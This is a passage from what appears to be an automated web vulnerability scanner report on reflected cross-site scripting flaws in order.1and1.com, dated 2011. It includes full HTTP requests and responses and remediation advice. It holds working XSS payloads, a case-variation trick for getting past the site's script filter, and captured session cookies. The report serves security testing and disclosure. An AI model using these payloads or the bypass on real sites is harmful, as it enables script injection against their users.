Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:26:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:40:23 GMT; Path=/
ETag: dd55d9401d77d604366a27b67fe7cbe6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 60366


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Hosting";UNOUNO.params.lastpage="Hosting2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.18. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload af2f1</ScRiPt%20>54b667825a6 was submitted in the REST URL parameter 3. This input was returned as af2f1</ScRiPt >54b667825a6 in a subsequent request for the URL /xml/order/Hosting.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Hostingaf2f1</ScRiPt%20>54b667825a6;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:26:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8jK1tkKh0eGjA1Mi8vMDIxLCw=; Expires=Fri, 07-Apr-2079 21:40:31 GMT; Path=/
ETag: 6bf983c9a22ff4b8293bdd71650f2e78
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 60334


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
115F77E4A430487B74D.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Hosting";UNOUNO.params.lastpage="Hostingaf2f1</ScRiPt >54b667825a6";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.19. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload f884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 was submitted in the REST URL parameter 3. This input was returned as f884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 in a subsequent request for the URL /xml/order/Hosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Hostingf884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:46:54 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTsvN2dwNikqJiUqJyQkJScmISE=; Expires=Fri, 07-Apr-2079 21:01:01 GMT; Path=/
ETag: cda9465f5926bed8b0023a0e52b6c03c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59779


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
115F77E4A430487B74D.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Hosting";UNOUNO.params.lastpage="Hostingf884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.20. http://order.1and1.com/xml/order/Instant [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Instant is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Instant. The payload 92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727 was submitted in the REST URL parameter 3. This input was returned as 92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727 in a subsequent request for the URL /xml/order/Instant.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Instant92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:03 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:38:10 GMT; Path=/
ETag: a59e5633696d2ae34547ee6975e60f98
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23877


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Instant";UNOUNO.params.lastpage="Instant92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.21. http://order.1and1.com/xml/order/MailInstantMail [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/MailInstantMail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MailInstantMail. The payload 17be3</ScRiPt%20>4a6827ab2d was submitted in the REST URL parameter 3. This input was returned as 17be3</ScRiPt >4a6827ab2d in a subsequent request for the URL /xml/order/MailInstantMail.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/MailInstantMail17be3</ScRiPt%20>4a6827ab2d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:25:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:39:11 GMT; Path=/
ETag: fc23060d5be31057dc0e68ab0f04deb0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25406


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="MailInstantMail";UNOUNO.params.lastpage="MailInstantMail17be3</ScRiPt >4a6827ab2d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.22. http://order.1and1.com/xml/order/MsHosting [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/MsHosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MsHosting. The payload 9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e was submitted in the REST URL parameter 3. This input was returned as 9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e in a subsequent request for the URL /xml/order/MsHosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/MsHosting9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Request 2

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:56:26 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=HdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUoMWFqMCMkIB8kIB4hHzA4Ly4=; Expires=Fri, 07-Apr-2079 18:10:33 GMT; Path=/
ETag: 17c5abe0f15d2a7d6b2b07c8f63d3dab
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59625


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9C6322067094898.TCpfix140a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="MsHosting";UNOUNO.params.lastpage="MsHosting9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.23. http://order.1and1.com/xml/order/Service [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Service is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Service. The payload 2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d was submitted in the REST URL parameter 3. This input was returned as 2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d in a subsequent request for the URL /xml/order/Service.

